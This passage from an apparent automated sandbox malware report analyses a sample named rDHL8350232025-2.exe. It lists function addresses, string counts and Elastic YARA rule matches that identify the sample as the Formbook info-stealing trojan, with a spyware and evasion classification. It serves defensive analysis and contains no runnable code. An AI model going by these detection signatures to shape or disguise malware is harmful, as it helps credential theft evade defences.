            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037003E62_2_037003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E02742_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C02C02_2_036C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C81582_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036301002_2_03630100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA1182_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F81CC2_2_036F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F41A22_2_036F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037001AA2_2_037001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D20002_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036407702_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036647502_2_03664750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C02_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C6E02_2_0365C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036405352_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037005912_2_03700591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F24462_2_036F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E44202_2_036E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EE4F62_2_036EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB402_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F6BD72_2_036F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA802_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036569622_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A02_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370A9A62_2_0370A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364A8402_2_0364A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036428402_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E8F02_2_0366E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036268B82_2_036268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4F402_2_036B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03682F282_2_03682F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660F302_2_03660F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E2F302_2_036E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364CFE02_2_0364CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632FC82_2_03632FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BEFA02_2_036BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640E592_2_03640E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEE262_2_036FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEEDB2_2_036FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652E902_2_03652E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FCE932_2_036FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364AD002_2_0364AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DCD1F2_2_036DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363ADE02_2_0363ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03658DBF2_2_03658DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640C002_2_03640C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630CF22_2_03630CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0CB52_2_036E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D34C2_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F132D2_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0368739A2_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E12ED2_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B2C02_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036452A02_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367516C2_2_0367516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F1722_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B16B2_2_0370B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364B1B02_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F70E92_2_036F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF0E02_2_036FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF0CC2_2_036EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036470C02_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF7B02_2_036FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036856302_2_03685630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F16CC2_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F75712_2_036F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037095C32_2_037095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DD5B02_2_036DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036314602_2_03631460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF43F2_2_036FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFB762_2_036FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B5BF02_2_036B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367DBF92_2_0367DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FB802_2_0365FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B3A6C2_2_036B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFA492_2_036FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7A462_2_036F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EDAC62_2_036EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DDAAC2_2_036DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03685AA02_2_03685AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E1AA32_2_036E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036499502_2_03649950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B9502_2_0365B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D59102_2_036D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AD8002_2_036AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036438E02_2_036438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFF092_2_036FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFFB12_2_036FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03641F922_2_03641F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03649EB02_2_03649EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7D732_2_036F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03643D402_2_03643D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F1D5A2_2_036F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FDC02_2_0365FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B9C322_2_036B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFCF22_2_036FFCF2
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeCode function: 3_2_03A816A53_2_03A816A5
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeCode function: 3_2_03A87DA33_2_03A87DA3
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeCode function: 3_2_03A87DA53_2_03A87DA5
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeCode function: 3_2_03A9EC853_2_03A9EC85
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeCode function: 3_2_03A814853_2_03A81485
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeCode function: 3_2_03A8147C3_2_03A8147C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E702C04_2_02E702C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E902744_2_02E90274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EB03E64_2_02EB03E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DFE3F04_2_02DFE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAA3524_2_02EAA352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E820004_2_02E82000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA81CC4_2_02EA81CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EB01AA4_2_02EB01AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA41A24_2_02EA41A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E781584_2_02E78158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DE01004_2_02DE0100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E8A1184_2_02E8A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E0C6E04_2_02E0C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DEC7C04_2_02DEC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF07704_2_02DF0770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E147504_2_02E14750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E9E4F64_2_02E9E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA24464_2_02EA2446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E944204_2_02E94420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EB05914_2_02EB0591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF05354_2_02DF0535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DEEA804_2_02DEEA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA6BD74_2_02EA6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAAB404_2_02EAAB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E1E8F04_2_02E1E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DD68B84_2_02DD68B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF28404_2_02DF2840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DFA8404_2_02DFA840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EBA9A64_2_02EBA9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF29A04_2_02DF29A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E069624_2_02E06962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAEEDB4_2_02EAEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E02E904_2_02E02E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EACE934_2_02EACE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF0E594_2_02DF0E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAEE264_2_02EAEE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DE2FC84_2_02DE2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DFCFE04_2_02DFCFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E6EFA04_2_02E6EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E64F404_2_02E64F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E32F284_2_02E32F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E10F304_2_02E10F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E92F304_2_02E92F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DE0CF24_2_02DE0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E90CB54_2_02E90CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF0C004_2_02DF0C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DEADE04_2_02DEADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E08DBF4_2_02E08DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DFAD004_2_02DFAD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E8CD1F4_2_02E8CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E912ED4_2_02E912ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E0B2C04_2_02E0B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF52A04_2_02DF52A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E3739A4_2_02E3739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DDD34C4_2_02DDD34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA132D4_2_02EA132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA70E94_2_02EA70E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAF0E04_2_02EAF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF70C04_2_02DF70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E9F0CC4_2_02E9F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DFB1B04_2_02DFB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EBB16B4_2_02EBB16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E2516C4_2_02E2516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DDF1724_2_02DDF172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA16CC4_2_02EA16CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E356304_2_02E35630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAF7B04_2_02EAF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DE14604_2_02DE1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAF43F4_2_02EAF43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EB95C34_2_02EB95C3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E8D5B04_2_02E8D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA75714_2_02EA7571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E9DAC64_2_02E9DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E35AA04_2_02E35AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E8DAAC4_2_02E8DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E91AA34_2_02E91AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E63A6C4_2_02E63A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAFA494_2_02EAFA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA7A464_2_02EA7A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E65BF04_2_02E65BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E2DBF94_2_02E2DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E0FB804_2_02E0FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAFB764_2_02EAFB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF38E04_2_02DF38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E5D8004_2_02E5D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF99504_2_02DF9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E0B9504_2_02E0B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E859104_2_02E85910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF9EB04_2_02DF9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF1F924_2_02DF1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAFFB14_2_02EAFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAFF094_2_02EAFF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EAFCF24_2_02EAFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E69C324_2_02E69C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E0FDC04_2_02E0FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA7D734_2_02EA7D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DF3D404_2_02DF3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02EA1D5A4_2_02EA1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_004615E04_2_004615E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0045C7C74_2_0045C7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0045C7D04_2_0045C7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0045C9F04_2_0045C9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0045AA704_2_0045AA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_004630EE4_2_004630EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_004630F04_2_004630F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00479FD04_2_00479FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00A4A0AF4_2_00A4A0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00A4B8B44_2_00A4B8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00A4B9D64_2_00A4B9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00A4ADD84_2_00A4ADD8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00A4BD6C4_2_00A4BD6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E5EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02DDB970 appears 280 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E25130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E6F290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02E37E54 appears 111 times
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: String function: 0004F9F2 appears 40 times
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: String function: 00039CB3 appears 31 times
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: String function: 00050A30 appears 46 times
            Source: rDHL8350232025-2.exe, 00000000.00000003.2011482929.0000000003AF3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rDHL8350232025-2.exe
            Source: rDHL8350232025-2.exe, 00000000.00000003.2011601383.0000000003C9D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rDHL8350232025-2.exe
            Source: rDHL8350232025-2.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4462305414.0000000003780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4461185601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2149589488.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2149639363.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4462330271.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/7
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A37B5 GetLastError,FormatMessageW,0_2_000A37B5
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000910BF AdjustTokenPrivileges,CloseHandle,0_2_000910BF
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_000916C3
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_000A51CD
